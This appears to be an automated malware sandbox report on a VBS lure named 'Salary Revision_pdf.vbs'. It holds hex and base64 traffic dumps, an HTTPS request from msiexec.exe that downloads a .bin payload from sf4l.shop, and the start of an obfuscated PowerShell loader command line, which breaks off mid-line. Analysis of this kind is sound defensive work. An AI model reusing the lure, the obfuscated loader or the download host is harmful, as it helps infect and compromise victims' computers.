                                                                                        Data Ascii: d0gWqRuM2wLZGkp6x0tGRxc9aEkHm71Luz1+undG/rp3Rv66d0b+undG/rp3Rv63qneXvlir7yegq2sYmjN++nd855u2RtzbPUa+umPoW5GAud7GyCJ5Q5c6TjrHQBz67/76q5kqsGo5eJHEvcQu5Zn8oxb0hdG0K0tjzLa45AUUS93dUn9lmKHFPv27xv66d0b+undG/rp3Rv66d0b+undG8ixCOGMQ7rScaTBFPvyRxv66d0b+undG/rp3Rv6
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 76 64 2b 59 4c 57 32 41 32 61 7a 73 30 59 74 66 53 76 74 62 6d 44 6c 47 57 53 66 39 66 66 47 2f 70 52 36 36 77 52 76 2b 67 53 4f 35 4a 50 31 35 38 48 30 48 4f 71 55 77 6c 79 6d 76 4f 33 36 65 4f 56 4c 77 6a 79 5a 63 51 74 59 74 39 6a 7a 38 67 4e 6c 50 77 7a 42 69 43 79 7a 78 37 53 57 34 4f 36 5a 72 5a 52 58 6d 6d 61 4f 61 48 56 64 37 70 6f 4c 70 45 32 55 34 4b 61 45 59 5a 64 77 41 64 6f 48 75 76 37 71 34 35 4d 5a 6d 41 36 45 75 56 30 35 64 47 44 35 49 58 59 66 45 37 41 56 6c 79 61 31 53 47 48 75 71 46 37 4a 38 50 4f 53 69 4b 71 77 48 4c 57 35 4a 77 4b 30 31 47 37 6e 69 47 32 75 2b 77 39 70 6b 46 41 31 31 75 6b 79 30 65 35 56 70 37 45 36 39 30 62 72 56 61 4f 70 39 4f 51 58 4f 78 62 75 38 44 46 65 79 35 4a 42 47 54 6a 58 4e 79 41 47 2f 46 56 71 48 56 55 2b
                                                                                        Data Ascii: vd+YLW2A2azs0YtfSvtbmDlGWSf9ffG/pR66wRv+gSO5JP158H0HOqUwlymvO36eOVLwjyZcQtYt9jz8gNlPwzBiCyzx7SW4O6ZrZRXmmaOaHVd7poLpE2U4KaEYZdwAdoHuv7q45MZmA6EuV05dGD5IXYfE7AVlya1SGHuqF7J8POSiKqwHLW5JwK01G7niG2u+w9pkFA11uky0e5Vp7E690brVaOp9OQXOxbu8DFey5JBGTjXNyAG/FVqHVU+
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 62 2b 75 6e 64 47 2f 64 69 6b 75 49 62 61 42 75 30 54 67 74 74 54 45 56 70 34 6b 4b 70 61 43 6f 65 67 54 64 30 6d 67 32 72 79 5a 77 41 59 4e 6f 74 53 46 63 44 4e 33 79 73 41 65 4b 6f 35 43 77 70 6c 43 30 66 47 42 76 32 6e 38 6e 69 59 75 57 4b 65 4f 51 2f 70 32 43 4f 52 6c 6b 37 7a 41 76 42 50 52 77 73 55 71 55 75 57 47 2f 34 36 64 31 51 2b 2b 4b 42 6d 6c 65 64 33 78 76 36 76 6e 6d 52 37 47 68 77 62 2f 6a 70 33 63 62 78 48 4f 65 61 56 35 33 66 47 2f 72 2f 6a 4a 44 77 35 74 76 38 59 4f 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 65 76 6a 37 4c 68 2f 62 37 63 73 2f 44 61 43 57 4f 61 75 6a 75 76 64 47 34 2f 64 30 74 7a 49 74 39 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 53 66 7a 71 68
                                                                                        Data Ascii: b+undG/dikuIbaBu0TgttTEVp4kKpaCoegTd0mg2ryZwAYNotSFcDN3ysAeKo5CwplC0fGBv2n8niYuWKeOQ/p2CORlk7zAvBPRwsUqUuWG/46d1Q++KBmled3xv6vnmR7Ghwb/jp3cbxHOeaV53fG/r/jJDw5tv8YOndG/rp3Rv66d0b+undG/rp3Rv66evj7Lh/b7cs/DaCWOaujuvdG4/d0tzIt90b+undG/rp3Rv66d0b+undG/rp3Sfzqh
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 2b 53 32 76 52 79 65 61 31 73 32 57 6c 33 67 4b 69 71 54 59 77 6d 48 61 65 78 34 39 52 71 7a 31 58 4f 7a 61 78 62 78 4c 65 78 34 62 74 55 56 37 58 4e 77 6d 35 52 62 37 72 48 56 55 2f 66 76 58 51 43 4d 69 6c 38 32 35 4f 6d 72 61 34 6d 75 35 6a 73 49 39 4b 4e 4f 6a 57 43 5a 57 71 5a 6d 33 6e 54 34 56 45 39 49 6b 48 77 4b 64 53 65 4c 61 35 6f 68 4a 59 38 56 4e 54 65 57 68 42 78 35 75 6f 36 58 72 4e 66 46 6d 75 6c 58 59 48 69 75 33 39 4c 75 67 46 4d 6c 4a 34 74 72 6d 69 45 6c 6a 78 55 31 4e 35 61 45 48 48 6d 36 6a 70 65 73 31 38 57 61 36 56 64 67 65 4b 37 66 30 75 36 41 55 79 55 57 71 55 5a 34 74 66 2f 46 65 34 39 48 6d 55 37 68 75 37 64 31 44 70 57 6a 70 50 2f 58 50 34 6b 4f 6f 55 2b 2b 75 7a 32 56 63 36 5a 6d 48 56 62 78 37 47 36 7a 74 42 31 46 63 38 52 70
                                                                                        Data Ascii: +S2vRyea1s2Wl3gKiqTYwmHaex49Rqz1XOzaxbxLex4btUV7XNwm5Rb7rHVU/fvXQCMil825Omra4mu5jsI9KNOjWCZWqZm3nT4VE9IkHwKdSeLa5ohJY8VNTeWhBx5uo6XrNfFmulXYHiu39LugFMlJ4trmiEljxU1N5aEHHm6jpes18Wa6VdgeK7f0u6AUyUWqUZ4tf/Fe49HmU7hu7d1DpWjpP/XP4kOoU++uz2Vc6ZmHVbx7G6ztB1Fc8Rp
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 32 67 75 71 53 34 47 65 45 70 44 6a 2b 34 57 73 6d 67 73 59 75 2b 46 42 4a 6f 37 6a 30 69 45 6c 47 44 45 39 49 64 36 64 63 4d 72 6f 55 58 38 45 35 53 47 79 4b 37 6e 53 68 35 49 45 39 44 55 31 52 76 51 6e 75 73 7a 61 6b 4a 37 47 6e 58 4a 43 6e 53 50 6f 66 6c 4b 33 37 4a 37 4b 2b 51 39 42 68 64 63 38 55 4f 4b 67 61 52 37 47 31 54 54 33 55 46 63 36 52 61 61 57 46 74 7a 30 34 44 70 6e 32 41 4a 4c 4c 38 52 33 45 74 57 57 6e 6c 71 4d 6f 32 57 4a 70 64 79 70 30 66 31 31 51 47 39 6d 75 76 4b 79 34 4b 75 2b 39 43 48 48 62 2b 63 2b 68 4a 79 32 31 56 63 56 45 47 70 4a 52 74 59 76 59 73 4e 38 49 4d 78 57 5a 33 4a 32 58 58 41 4f 4f 64 74 74 41 45 55 71 4a 5a 51 75 4f 43 4c 6d 72 78 2b 6f 53 38 2f 4f 50 38 41 6f 6f 4f 5a 61 74 6e 6c 74 4f 36 6f 34 5a 42 6e 70 39 38 62
                                                                                        Data Ascii: 2guqS4GeEpDj+4WsmgsYu+FBJo7j0iElGDE9Id6dcMroUX8E5SGyK7nSh5IE9DU1RvQnuszakJ7GnXJCnSPoflK37J7K+Q9Bhdc8UOKgaR7G1TT3UFc6RaaWFtz04Dpn2AJLL8R3EtWWnlqMo2WJpdyp0f11QG9muvKy4Ku+9CHHb+c+hJy21VcVEGpJRtYvYsN8IMxWZ3J2XXAOOdttAEUqJZQuOCLmrx+oS8/OP8AooOZatnltO6o4ZBnp98b
                                                                                        2024-10-21 15:05:26 UTC1369INData Raw: 72 4d 4c 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 53 64 6e 4c 59 70 37 4a 2f 49 62 6c 37 38 6c 33 59 7a 4b 70 4f 33 35 44 62 2f 31 4d 50 36 35 30 68 71 6e 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 53 52 79 39 6b 6b 30 48 38 43 6c 6c 55 6e 77 5a 6f 57 35 7a 4c 38 59 75 6f 39 55 68 6f 66 6f 33 52 74 42 37 36 72 42 55 43 58 73 5a 4b 58 54 34 4d 53 6d 35 64 31 55 58 46 33 70 4b 4c 2f 4f 4b 63 73 54 36 56 63 56 56 33 44 6e 31 42 79 7a 61 6e 50 4c 58 5a 65 4c 33 6e 54 6c 71 2f 54 56 58 4e 6a 4e 2b 66 2f 69 39 65 6e 4b 32 50 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 56 78 56 68 52 35 58 35 6f 4a 48 68 58 49 4f 6d 67 75 4c 6b 6f 35 51
                                                                                        Data Ascii: rMLd0b+undG/rp3Rv66d0b+undG/rp3SdnLYp7J/Ibl78l3YzKpO35Db/1MP650hqn6d0b+undG/rp3Rv66d0b+undG/rp3SRy9kk0H8CllUnwZoW5zL8Yuo9Uhofo3RtB76rBUCXsZKXT4MSm5d1UXF3pKL/OKcsT6VcVV3Dn1ByzanPLXZeL3nTlq/TVXNjN+f/i9enK2Prp3Rv66d0b+undG/rp3Rv66d0b+uVxVhR5X5oJHhXIOmguLko5Q
                                                                                        2024-10-21 15:05:26 UTC1225INData Raw: 63 38 43 2b 37 34 30 6d 73 64 56 54 39 2b 2f 64 41 6e 7a 4b 62 32 6d 58 33 66 53 62 47 4a 72 43 2b 34 4c 49 2b 56 56 33 6d 59 79 70 64 4b 4d 6d 6e 70 33 75 45 2b 77 57 36 4f 31 69 33 2f 73 58 67 32 30 6a 57 44 55 75 44 45 51 46 76 58 2f 75 70 6a 51 6e 37 7a 70 4e 37 6d 62 73 69 49 4c 66 6b 79 4b 46 67 6d 44 2f 31 36 4d 36 42 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 35 54 6e 55 2f 6c 51 4d 31 39 49 37 6d 53 46 56 69 6c 70 37 46 57 61 77 35 41 45 44 4a 59 61 64 4b 52 7a 79 44 4d 70 7a 48 63 62 4d 4d 56 64 4b 76 56 76 66 6f 6d 2f 33 53 56 42 4c 72 34 44 44 44 45 45 32 32 30 43 31 4c 4f 6c 47 6e 39 66 41 4d 6e 56 55 61 78 36 46 4d 6d 30 68 65 44 38 65 63 51 36 6f 46 49 6a 46 2b 51 62 30 6e 67 6a 4f 69 45 4a 58 48 33
                                                                                        Data Ascii: c8C+740msdVT9+/dAnzKb2mX3fSbGJrC+4LI+VV3mYypdKMmnp3uE+wW6O1i3/sXg20jWDUuDEQFvX/upjQn7zpN7mbsiILfkyKFgmD/16M6B+undG/rp3Rv66d0b+undG/rp3Rv65TnU/lQM19I7mSFVilp7FWaw5AEDJYadKRzyDMpzHcbMMVdKvVvfom/3SVBLr4DDDEE220C1LOlGn9fAMnVUax6FMm0heD8ecQ6oFIjF+Qb0ngjOiEJXH3


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.749930188.114.97.34438140C:\Windows\SysWOW64\msiexec.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-21 15:05:53 UTC186OUTGET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                        Host: sf4l.shop
                                                                                        Cache-Control: no-cache
                                                                                        2024-10-21 15:05:54 UTC828INHTTP/1.1 200 OK
                                                                                        Date: Mon, 21 Oct 2024 15:05:54 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=14400
                                                                                        CF-Cache-Status: EXPIRED
                                                                                        Last-Modified: Mon, 21 Oct 2024 15:05:54 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dh748ytpoiZjPW0mVaOFH34DMy2JhfXcVeZS590Y6IteqdJZ6jPWz1mJlvTqu%2FpLhf8XaXYqdh7LHmQN4dst07%2BFdqz1FyN2y9APgZ5XsCQEZ5EUVtEW3MB44w4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d6226015fc442d8-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=824&delivery_rate=2819863&cwnd=251&unsent_bytes=0&cid=96dbe4b13657a19f&ts=802&x=0"
                                                                                        2024-10-21 15:05:54 UTC541INData Raw: 33 38 63 35 0d 0a 02 ab f2 8d d1 e3 f5 c1 50 44 fb 99 ca cf 8d 76 89 30 26 c0 90 7a 40 80 1a f3 50 3c 40 c4 41 f7 9f ae b1 9b ec 92 25 cc 2f 40 ea 3c c4 6e 4e c6 07 8f ee a4 5f ec 2f 39 5d 14 50 b6 05 a8 df 0c f2 e0 90 58 96 87 f6 55 4b 62 ca eb 0a c8 26 f5 d6 5f 52 95 11 d7 7d 71 5e 80 02 d3 5a 83 34 c3 c0 bb 50 3b b8 98 f8 14 2f 36 4d 8c 74 91 21 7a 2d 92 a0 48 4e d5 9e 48 34 96 e0 05 fd a2 91 2c 5b 84 82 9e af 85 85 fb 06 e7 06 ad c4 c4 45 bd 4a f4 00 74 30 49 02 da 7c fc e5 aa f6 48 ac 99 36 48 a7 38 42 90 0d c0 18 5b 17 3a 86 af 40 75 10 73 b1 ab 20 2b df 93 b8 d1 fd 6e d7 66 e1 77 e8 32 89 01 7f d7 a7 2f da 70 77 aa 72 54 4f 71 1c 98 dd c8 e3 13 2d 00 20 f6 9a f3 4c 84 1e 1d e8 71 af 80 9f 61 a3 64 56 1b 44 86 f0 29 42 64 aa 04 69 1a f2 5c f8 ec f3
                                                                                        Data Ascii: 38c5PDv0&z@P<@A%/@<nN_/9]PXUKb&_R}q^Z4P;/6Mt!z-HNH4,[EJt0I|H6H8B[:@us +nfw2/pwrTOq- LqadVD)Bdi\
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: f3 c9 1a b5 25 6a 9a a0 f3 ce 9a 89 66 63 7c 04 ef 4e 88 d3 da ff ec ab 2c a5 43 de f2 63 c0 2e f1 3a ce 26 78 34 9c b7 59 19 44 a0 2d 7e 9c ea 4e 1d 69 4b ed f0 ab cd a2 0d 21 90 25 d1 03 4d 78 63 3f 6c 73 84 7b d3 b3 b0 51 f7 1b e6 09 d7 82 bb 29 f6 6f 9e ce 2b fe d7 ac a7 07 53 2f e4 89 e3 e2 4e 88 3c 18 f8 02 ac 92 e2 40 60 e3 3c a3 44 55 2c 56 7d 80 66 47 6d 5d 53 ea c1 f3 24 dd dc 3a 80 41 6b 94 1b c0 00 83 d8 59 71 a5 af b8 09 9d 39 84 dd 6f e3 5e 36 bf 15 c5 78 9b 2b 19 95 77 3d 25 b3 bf cd e7 99 eb 2c 64 62 ba 4c f8 57 1e 3e 44 03 f8 d5 75 0a 48 c4 e6 b4 b5 10 74 f2 fb 05 1c 84 e3 1a f2 f1 13 cf 91 b4 b1 ad ea 92 00 fb 9b c7 75 87 c5 f4 dc 75 99 82 97 a0 fa e0 60 48 53 91 64 28 7a a9 a0 87 76 1b 65 d9 5d c0 48 2c dc 80 cc 22 90 f1 04 01 30 99 4a
                                                                                        Data Ascii: %jfc|N,Cc.:&x4YD-~NiK!%Mxc?ls{Q)o+S/N<@`<DU,V}fGm]S$:AkYq9o^6x+w=%,dbLW>DuHtuu`HSd(zve]H,"0J
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: a0 f8 a2 e3 05 bc 60 28 cc 01 dc 38 78 31 3c 8c 36 4f 7c 86 a4 09 0d a7 e1 20 87 79 c7 fb 5e 30 ef 1d 79 4d c4 97 26 aa db c3 2d c5 b5 c2 d6 7b ae 61 f1 13 1a 7b 18 47 12 7d f4 5d fd 0e 26 ba ae 1d 94 fd 86 5f 52 e2 77 bd 8a 5b 2c 8e 55 24 16 92 82 d1 e7 3a 4e f1 4e 61 5b fa 5e c8 3d f8 7e 85 b3 06 95 f5 d9 c8 8b 56 fa 8b fe a1 30 f4 5f 17 91 4c cc ba 33 cd d9 95 14 43 65 b8 2c 2e 2b 26 e2 e4 c9 35 7d e4 5f 92 65 cc f7 a0 5f 42 bd 8b 09 9e 73 6f 0c 2a 64 df c1 14 10 d5 fd 6c b3 6c 35 fe 88 fc 8d 4b 34 e2 ee 08 8f d3 45 5c 41 7e 87 18 3d 4b c4 80 49 20 4a 19 72 03 0e 17 74 99 1d a9 f0 cb 92 27 6e 78 42 de c4 28 15 c7 ce e7 3a 7a a9 71 a8 a6 ba a6 59 79 9e d7 fb d8 ac ef 85 ff 6f d0 76 fb f2 c1 32 a8 85 1f 1d b1 ac 50 10 fc 24 24 d0 9b 82 ac 43 ce 9e 99 b2
                                                                                        Data Ascii: `(8x1<6O| y^0yM&-{a{G}]&_Rw[,U$:NNa[^=~V0_L3Ce,.+&5}_e_Bso*dll5K4E\A~=KI Jrt'nxB(:zqYyov2P$$C
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: 82 f2 23 4b 9b 73 0b ef ca 17 58 96 7f 61 4a cf 5f cb 84 b4 6d 30 90 e2 9d 48 a2 59 d1 b6 10 53 7d 3d 8c 2b f6 33 df 18 4d 8d 15 b1 7c 67 bc 8c 4a fc 68 4f b2 59 6c 64 44 ad e4 bc 39 9a c6 89 a2 85 95 9d a5 0e 87 ef 0e 80 ca 21 36 93 8a 66 6f 4e 58 bd 06 fc 4f 2c 94 aa 86 fc 17 5a 82 e3 96 1d dc d6 f3 70 f6 42 86 d3 81 e2 fa 1d b8 6a 8a 51 08 4b 0a 85 39 f8 44 86 52 a8 c2 e0 cd 0c 43 17 08 88 05 3b a2 1b 2b 34 db 18 f3 12 6f 28 ca e9 f9 1c da bf 08 bd 0e 00 86 38 22 ff 7d 02 62 5f 42 1f 2e 83 64 08 c6 cf 2f 49 6f 75 d1 57 2b 07 b9 63 29 ca 1b 7a 75 f5 24 86 72 0a 5f 8b ca 53 9f 7f 72 07 90 42 aa 50 2c fd 8d 70 65 92 63 ac bd f1 95 2a 5f c9 49 59 d3 11 d5 75 b4 b8 b6 bb 6f 62 a1 82 b9 fa b7 24 d6 0f dc 8e ae 25 c8 05 7d f1 32 0f f3 52 70 65 5f 5a 2e f1 1d
                                                                                        Data Ascii: #KsXaJ_m0HYS}=+3M|gJhOYldD9!6foNXO,ZpBjQK9DRC;+4o(8"}b_B.d/IouW+c)zu$r_SrBP,pec*_IYuob$%}2Rpe_Z.
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: d2 4c 56 e9 7a a5 4b 24 d0 ca 2b 19 22 00 88 4f e1 c9 af c1 7b 48 db b7 6d f4 7b c2 7e 3c 7e 0a 55 6f 7f bc 27 3b 7c 85 e3 1c ca e1 19 6e b5 cc 28 1c c1 85 78 92 d9 f5 f4 02 8f ac 49 51 14 0c 13 41 1f 3b ff 79 d9 7a 7d 3e e9 7f 6d 46 a3 fd 64 b9 e2 44 63 e4 33 51 bd e8 59 33 59 db 99 ed b3 cf 2e aa 5a 72 c6 a6 07 f2 41 0b 02 e4 8c 8c 97 a9 3f d4 ab 33 f3 c6 bb 01 1f 33 c2 71 61 e7 30 89 53 de 27 76 93 cb 37 7a f8 59 19 7f c2 6d 9f 2d 82 6f ef 92 28 9e 66 5e 70 28 ba 06 f3 1e 83 a0 68 52 74 35 6f 8e c7 d1 d6 34 28 eb 71 44 46 ee 06 b1 19 2b 21 ea ce 8a 44 e4 31 57 5e 12 2c 78 b2 99 a7 17 e5 cc 06 28 ca d9 74 96 46 8c 93 34 39 df d1 00 2e c3 4d 12 ff b0 b3 b3 6c c9 e8 c4 71 ab 7d 69 99 bf 83 83 da 94 fc 86 1f f0 7b 99 90 e7 5a c0 aa 49 fc 7b 25 be 84 ac 46
                                                                                        Data Ascii: LVzK$+"O{Hm{~<~Uo';|n(xIQA;yz}>mFdDc3QY3Y.ZrA?33qa0S'v7zYm-o(f^p(hRt5o4(qDF+!D1W^,x(tF49.Mlq}i{ZI{%F
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: 11 79 47 61 18 78 eb 35 98 3e 80 41 a0 7c 90 4f ad 9a b9 25 63 86 47 5f b3 3f c6 0f d5 3e b5 d5 f9 59 f0 38 87 94 7d 92 5e 9f e0 d8 4c 40 9d 0f ce 19 d3 9b a1 7e 40 d3 51 82 9f ca fc 07 5e 85 88 83 92 0e 77 38 e8 8b a2 11 0f 11 84 1d 45 a2 7a d8 27 10 4a 4e 52 61 5a e8 94 96 87 75 04 23 da 30 dc 18 7c 1a 5f 05 5b a9 c3 a3 79 75 d1 85 56 2f 91 fd d0 ec ce b5 14 4b 2c dc 0b 99 22 1b 3e 6e 01 5a d9 c3 a6 23 6a 62 31 58 42 11 c8 10 53 5a c8 f3 99 a8 50 c8 4a 77 45 fe e2 e2 d1 3e ff 46 9e b9 9d c4 08 93 97 b0 eb 3c 74 8e 91 94 f0 9b f7 8c cf 80 0d 1c 28 02 b2 9c 2e 32 31 1f bf d5 d3 e3 46 84 dc 54 73 1d 97 1c 4c 3b 3c 25 fa da c4 de 9e 7a 56 98 2f a4 5d f6 d4 99 58 51 3c 46 34 c2 41 e3 27 0f 73 1a 72 cf 0e eb 60 81 7f 81 92 71 5e f9 f8 66 bd 91 8b f7 90 c8 54
                                                                                        Data Ascii: yGax5>A|O%cG_?>Y8}^L@~@Q^w8Ez'JNRaZu#0|_[yuV/K,">nZ#jb1XBSZPJwE>F<t(.21FTsL;<%zV/]XQ<F4A'sr`q^fT
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: 58 b6 0a 60 e6 84 2a 92 9d 7a 4b c9 d9 40 d7 93 fa 51 c7 30 e5 b7 c0 aa bc 0a 52 a9 d0 42 2e dd dc 12 8a 64 14 30 d7 4a 93 a2 98 4d 9d 85 d1 0f 80 66 c3 3e 6a 05 43 e8 b2 4c 7b b0 d0 ad 79 de b6 c8 6c 49 9f 25 2f 29 ef 40 da 48 b8 c7 52 ae cb e7 a9 c5 7e 2a 3f b6 4a c6 96 50 42 20 d2 c7 69 ba f6 6d 57 89 e8 14 ac 3d 00 6f fc 32 1a a4 4a ad bf a2 26 70 0b 27 3c 7b 9b 35 cc 8a 21 4a fa ef fc f6 b0 9d dc 5c b5 81 d9 8a db 44 28 83 c1 8c 03 66 88 0a 4d 13 46 04 48 71 ea 32 84 db 95 4d df fc be 2e de 7c 0c 0e 16 14 34 84 f2 7a 76 d5 9b e8 3d 4a 36 e6 e2 ce a2 a8 a4 3f 4b 2c 6d 00 28 77 5b d1 bf 93 7d 95 59 31 ec ea 46 be 02 8a 71 95 88 a1 73 63 c6 57 de 32 75 f1 4d 8d be 52 18 5b 47 ae 82 40 5c 06 07 49 a4 26 4b 92 89 c6 da 98 4b 5f e9 04 3e 42 ad 81 2d 57 b3
                                                                                        Data Ascii: X`*zK@Q0RB.d0JMf>jCL{ylI%/)@HR~*?JPB imW=o2J&p'<{5!J\D(fMFHq2M.|4zv=J6?K,m(w[}Y1FqscW2uMR[G@\I&KK_>B-W
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: 6e f5 d1 a1 08 38 a1 b9 e8 83 10 53 96 ec 5c 2b 8a 85 7e 1c d0 e2 60 63 8c 9f 29 24 6a b9 ed 63 02 79 1c 50 99 90 1e ee 79 ed 86 4b f0 bf 5b 02 c3 ed a9 11 18 d0 a8 0f 75 0f 04 10 a9 17 1f 7d 39 63 79 f1 ce bb ac d7 53 76 38 f9 d7 1d 9f 66 d2 2c fd 8d c1 e1 83 63 45 c3 7a 45 a7 82 05 d1 59 d3 11 64 11 a5 b8 5f c9 e4 b2 2c 76 37 34 f5 05 00 84 90 f3 21 1c 6a 49 59 b9 51 cd c2 56 99 10 d4 8a a3 d7 38 14 ad 21 e2 aa 86 d0 47 95 2d eb 07 ec d5 cb 38 9a 19 e6 1f 9e b7 1b 5f 4d 04 e2 a7 1d b2 3a d1 34 90 a9 12 86 b4 0a f2 f1 30 e2 1b fb f4 1f c4 86 27 44 b4 1f 9e b1 4d ff 51 dd 9f 6f 66 87 59 06 6a c0 f6 a6 0b fe 28 be ad b8 70 17 52 60 f2 a3 42 90 5e 77 14 8e 57 76 ab 14 d6 dd 4d d1 5a 59 f6 64 6d 25 2d 8b 29 c9 64 4f 52 99 ad 6a 78 cd a5 3d 69 99 ba 7e f8 ce
                                                                                        Data Ascii: n8S\+~`c)$jcyPyK[u}9cySv8f,cEzEYd_,v74!jIYQV8!G-8_M:40'DMQofYj(pR`B^wWvMZYdm%-)dORjx=i~
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: e9 6e c2 63 05 d4 37 bf 95 bb c4 ac 87 7b 16 bf b4 10 0a 4e 5b ca dd 9b 05 1b 01 7c b8 f2 9c 0c a1 71 e2 5d 2c d4 06 59 89 77 52 74 dd 61 84 c7 38 2f 31 06 16 fa 00 da ad f3 fd 22 cb 22 22 0b 48 11 b7 ec 01 5c 3b f8 c2 c1 d5 31 ef ac 06 ee 5d 26 26 8b 38 47 fc 94 34 39 d0 10 ff 40 64 2c c5 fe 23 3c 7d 6d b8 15 3b 8e 76 22 0a 8c 8a 97 08 72 48 da 80 85 0d 84 12 dd 63 aa 37 c4 4a 77 d4 fb dd 94 b6 dd 2e 12 89 5d 19 d9 92 56 fe f3 4f f7 f0 9c 18 93 a6 8d ff dd 08 84 8e 73 a5 91 e4 b4 88 a2 8c 8d fb dd f9 11 19 96 38 a0 97 6d a5 f1 64 9e b1 03 3a 89 3f 73 50 42 b3 70 37 6b 62 e3 dc 4c 37 3b e8 9a 6e 3f fe 3e cb 0b fe d5 4c 7e 3c f9 b9 14 a9 30 6d 26 1e 47 2b e7 bc 7b 16 0a d8 5d 39 7d 80 f2 8e a6 f2 d6 25 4c 85 4b 09 96 31 39 60 cd e4 8e 80 bc 60 fd d2 16 6a
                                                                                        Data Ascii: nc7{N[|q],YwRta8/1"""H\;1]&&8G49@d,#<}m;v"rHc7Jw.]VOs8md:?sPBp7kbL7;n?>L~<0m&G+{]9}%LK19``j
                                                                                        2024-10-21 15:05:54 UTC1369INData Raw: 86 c4 9f 70 33 dd 14 31 70 6d bb 9d 6e aa 40 2f 63 fe 4f 8d a6 6a b4 c1 d5 06 9b 6d 65 ab 37 1f 3b e4 62 d0 6c c6 6c 7f 82 92 65 7e 33 17 9f 90 d5 35 79 52 09 21 96 f0 e9 78 cb 6e 4f 02 d2 19 02 39 9f 64 26 fd 52 20 3f d3 c7 8a a7 51 43 00 fa 8e 97 59 4f 75 25 b5 c1 c4 de 1e 7d d1 dd 7c c7 d1 5f 7b 99 7c 9d 20 73 39 c0 3d d8 a0 4c 55 30 99 8b fe 49 c4 57 ee e2 0e 2c 05 3b 17 12 12 53 e8 46 b8 37 a4 9d 9a c9 9e 82 68 9f 54 7d 43 a4 cc eb e2 c3 e7 fb d9 7e 80 96 fb d1 c8 98 63 58 2a 06 49 c8 ee 11 be 4f 39 ea 9b 74 4e 12 97 7b 9e 70 b6 70 44 cf 11 92 e8 ad f1 8e 7b 2a fc f3 d3 dc a8 05 1a 35 8a 29 0e 98 9f 8b 44 91 b9 da a8 0d 11 13 0e ca a3 7f ce 63 d3 26 51 02 9c 45 fa e4 55 e1 43 70 a0 82 5a ba 52 96 b3 82 c0 d0 94 2d 24 d3 1d d2 5b 35 ef ba 16 a0 98 44
                                                                                        Data Ascii: p31pmn@/cOjme7;blle~35yR!xnO9d&R ?QCYOu%}|_{| s9=LU0IW,;SF7hT}C~cX*IO9tN{ppD{*5)Dc&QEUCpZR-$[5D


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:05:15
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
                                                                                        Imagebase:0x7ff669d60000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:11:05:17
                                                                                        Start date:21/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam 